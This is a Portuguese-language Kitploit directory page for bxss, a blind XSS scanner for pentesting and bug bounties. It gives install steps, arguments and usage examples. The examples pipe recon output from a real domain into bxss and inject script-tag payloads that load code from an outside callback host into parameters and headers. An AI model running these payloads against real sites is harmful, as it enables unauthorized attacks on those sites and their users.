Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
bxss — Blind XSS Scanner é uma ferramenta que pode ser usada para escanear vulnerabilidades de XSS cego em aplicações web. | Kitploit
Ferramentas/GitHubGitHub/ethicalhackingplayground/bxss
Scanners de VulnerabilidadesScanners de Vulnerabilidades WebColeta de InformaçõesSegurança WebTestes de Penetração
GitHubethicalhackingplayground/bxss

bxss

Blind XSS Scanner é uma ferramenta que pode ser usada para escanear vulnerabilidades de XSS cego em aplicações web.

Ver Repositório
41855há 1 anoRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar


Bxss
Bxss - Scanner de XSS Cego

Version License Go Report Card Go Reference


🚀 Descrição

Bxss é um scanner de Blind XSS de alto desempenho que automatiza a detecção de vulnerabilidades de Blind XSS em aplicações web.


✨ Funcionalidades

  • Injeta payloads de Blind XSS em cabeçalhos e parâmetros personalizados
  • Suporta múltiplos métodos HTTP (PUT, POST, GET, OPTIONS)
  • Escaneamento de alta velocidade com suporte a concorrência
  • Facilmente encadeável com outras ferramentas
  • Instalação e uso simples

🧠 Em Progresso

Estamos trabalhando ativamente na integração de um pool de workers baseado em Chromium para melhorar o desempenho do bxss em dispositivos de baixo custo.

Esta funcionalidade permitirá que tarefas intensivas em recursos, como detecção de XSS baseado em DOM ou inspeção de payload pós-acionamento, sejam transferidas para instâncias leves do Chromium gerenciadas através de um pool. Ao distribuir a carga de trabalho por múltiplos contextos de navegador headless de forma controlada e eficiente, o bxss permanecerá responsivo e utilizável mesmo em máquinas de especificações mais baixas.

Isso tornará o bxss não apenas poderoso, mas também altamente acessível, independentemente das limitações do sistema.


✅ TODOs

  • Pool de workers baseado em Chromium para interação com DOM e verificação visual
  • Saída opcional de relatórios em HTML/JSON
  • Adicionar suporte para personalização de payloads multiplataforma (XSS Hunter, Interactsh, etc.)
  • Suporte a proxy
  • Importar requisições personalizadas

🧪 Funcionalidades Experimentais

  • Modo Trace (experimental)

📦 Instalação

root@kitploit:~
go install -v github.com/ethicalhackingplayground/bxss/v2/cmd/bxss@latest

⚙️ Argumentos


🎬 Demonstração

Demo


📝 O que é o Modo Trace?

O Modo Trace é uma funcionalidade experimental que permite rastrear onde o BlindXSS foi acionado. Algumas plataformas de BlindXSS de terceiros, como o https://xss.report/, permitem que você especifique parâmetros personalizados nos seus payloads. Isso permite rastrear onde o BlindXSS foi acionado. Por exemplo, se você especificar o parâmetro url=https://somehost.com no seu payload, a ferramenta usará o payload:

root@kitploit:~
'"><script src=https://xss.report/c/username?url=https://somehost.com></script>'

para teste e, ao ser acionado, você poderá inspecionar o DOM e ver de qual host o BlindXSS foi acionado.

Xss Report

Certifique-se de, ao atribuir parâmetros personalizados no seu painel, atribuir url={LINK} para que o bxss possa substituir automaticamente {LINK} pela URL real.

🔥 Exemplos de Uso

Parâmetros

root@kitploit:~
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-t

Anexar aos Parâmetros

root@kitploit:~
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -a -p '><script src=https://xss.report/c/username></script>' \
-t

Cabeçalhos e Parâmetros

root@kitploit:~
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t

Cabeçalho X-Forwarded-For

root@kitploit:~
subfinder -d uber.com \
| gau \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "X-Forwarded-For"

Cabeçalhos e Parâmetros Personalizados

root@kitploit:~
echo uber.com \
| haktrails subdomains \
| httpx \
| hakrawler -u \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t

Google Dorks com Dorki

root@kitploit:~
curl -X GET -H "Authorization: Bearer <Token>" \
-H "X-Secret-Key: <Secret>" \
https://dorki.attaxa.com/api/search?q=site:example.com -s \
| jq -r .[][].url \
| grep "&" \
| bxss -a -p '><script src=https://xss.report/c/username></script>'

Cabeçalhos e Parâmetros Personalizados com Limite de Taxa

root@kitploit:~
echo uber.com \
| haktrails subdomains \
| httpx \
| hakrawler -u \
| bxss -a -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \ 
-t \
-rl 10

Para dorking avançado e exploração de vulnerabilidades, confira o Dorki e inscreva-se hoje!


☕ Apoie o Projeto

Se você conseguir uma recompensa usando esta ferramenta, considere apoiar comprando um café para mim!

Buy Me A Coffee

Baixar ferramenta
ArgumentoDescriçãoPadrão
-aAnexar o payload ao parâmetrofalse
-c intDefinir o nível de concorrência30
-H stringDefinir um cabeçalho personalizado""
-hf stringCaminho para o arquivo com cabeçalhos""
-p stringO payload de Blind XSS""
-pf stringCaminho para o arquivo com payloads""
-tTestar parâmetros para Blind XSSfalse
-X stringMétodo HTTP a usar""
-vAtivar modo de depuraçãofalse
-rl floatLimite de taxa (requisições por segundo)0
-fSeguir redirecionamentosfalse
-lAtivar Modo Trace (experimental)false